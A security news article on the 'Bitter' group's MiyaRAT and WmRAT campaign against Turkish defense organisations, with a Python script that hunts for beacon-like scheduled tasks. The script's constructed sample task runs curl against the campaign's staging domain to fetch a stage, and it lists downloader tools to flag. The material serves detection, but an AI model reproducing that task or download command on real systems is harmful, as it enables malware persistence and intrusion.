'Bitter' cyberspies target defense orgs with new MiyaRAT malware
A cyberespionage threat group known as 'Bitter' was observed targeting defense organizations in Turkey using a novel malware family named MiyaRAT.
MiyaRAT is used alongside WmRAT, a cyberespionage malware family previously associated with Bitter.
Proofpoint discovered the campaign and reports that the new malware is likely reserved for high-value targets, deployed only sporadically.
Bitter is a suspected South Asian cyberespionage threat group active since 2013, targeting government and critical organizations in Asia.
In 2022, they were spotted by Cisco Talos in attacks against the Bangladeshi government, using a remote code execution flaw in Microsoft Office to drop trojans.
Last year, Intezer reported that Bitter was impersonating the Embassy of Kyrgyzstan in Beijing in phishing attacks targeting various Chinese nuclear energy companies and academics.
Abusing alternate data streams
The attacks in Turkey started with an email containing a foreign investment project lure, attaching a RAR archive.
The archive contains a decoy PDF file (~tmp.pdf), a shortcut file disguised as a PDF (PUBLIC INVESTMENTS PROJECTS 2025.pdf.lnk), and two alternate data streams (ADS) embedded in the RAR file, named "Participation" and "Zone.Identifier".
Opening the LNK file executes PowerShell code hidden in the ADS, which opens the legitimate decoy PDF as a distraction while creating a scheduled task named "DsSvcCleanup" that runs a malicious curl command every 17 minutes.
The command reaches a staging domain (jacknwoods[.]com) and awaits responses such as commands to download additional payloads, perform network reconnaissance, or steal data.
Proofpoint reports that a command to fetch WmRAT (anvrsa.msi) in the attack they examined was served within 12 hours.
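The persistence mechanism described above (a scheduled task that invokes curl on a short repetition interval) can be hunted for in exported Task Scheduler XML. The following is an added Python example, not Proofpoint's detection logic or any code from the report: the task XML samples are constructed, and the 30-minute beacon threshold and the list of download utilities are assumptions.

```python
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
KNOWN_TASK_NAMES = {"DsSvcCleanup"}              # task name reported for this campaign
DOWNLOADERS = ("curl", "bitsadmin", "certutil")  # built-in tools often used to fetch stages (assumption)
MAX_INTERVAL_MIN = 30                            # beacon-like repetition threshold (assumption)

def iso_minutes(interval):
    """Convert a Task Scheduler ISO 8601 duration (PT17M, PT1H, P1D) to minutes, or None."""
    m = re.fullmatch(r"P(?:(\d+)D)?T?(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?", interval or "")
    if not m or not any(m.groups()):
        return None
    d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return d * 1440 + h * 60 + mi + s / 60

def triage_task(name, xml_text):
    """Return the reasons a task export resembles the beacon described above ([] if none)."""
    root = ET.fromstring(xml_text)
    reasons = []
    if name in KNOWN_TASK_NAMES:
        reasons.append(f"task name {name!r} matches a known indicator")
    for iv in root.iterfind(".//t:Repetition/t:Interval", NS):
        mins = iso_minutes(iv.text)
        if mins is not None and mins <= MAX_INTERVAL_MIN:
            reasons.append(f"repeats every {iv.text} (beacon-like)")
    for ex in root.iterfind(".//t:Actions/t:Exec", NS):
        cmd = (ex.findtext("t:Command", "", NS) or "").strip().lower()
        if any(tool in cmd for tool in DOWNLOADERS):
            reasons.append(f"download utility as task action: {cmd}")
    return reasons

# Constructed sample exports (schtasks /Query /XML style); not captured from the intrusion.
BEACON_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger>
    <Repetition><Interval>PT17M</Interval></Repetition>
    <StartBoundary>2024-11-01T09:00:00</StartBoundary>
  </TimeTrigger></Triggers>
  <Actions><Exec><Command>curl.exe</Command>
    <Arguments>-s https://jacknwoods[.]com/ -o %TEMP%\\stage</Arguments></Exec></Actions>
</Task>"""
DEFRAG_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2024-11-01T03:00:00</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Actions><Exec><Command>%SystemRoot%\\system32\\defrag.exe</Command></Exec></Actions>
</Task>"""

if __name__ == "__main__":
    for name, xml in (("DsSvcCleanup", BEACON_TASK_XML), ("ScheduledDefrag", DEFRAG_TASK_XML)):
        print(name, "->", triage_task(name, xml) or ["no findings"])
```

Feeding every task exported with `schtasks /Query /XML` through `triage_task` surfaces the combination of a short repetition interval and a command-line downloader, which is a stronger signal than the task name alone since names are trivially changed.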

The WmRAT and MiyaRAT malware
Bitter first deployed WmRAT on the target, but when it failed to establish communication with the command and control server, it downloaded MiyaRAT (gfxview.msi).
Both are C++ remote access trojans (RATs) that give Bitter data exfiltration, remote control, screenshot capture, command execution (via CMD or PowerShell), and system monitoring capabilities.
MiyaRAT is newer and generally more refined, featuring more advanced data and communications encryption, an interactive reverse shell, and enhanced directory and file control.
Its more selective deployment by Bitter may indicate that the threat actors reserve it for high-value targets, minimizing its exposure to analysts.
Indicators of compromise (IoCs) associated with this attack are listed at the bottom of Proofpoint's report, and Proofpoint has also published a YARA rule to help detect the threat.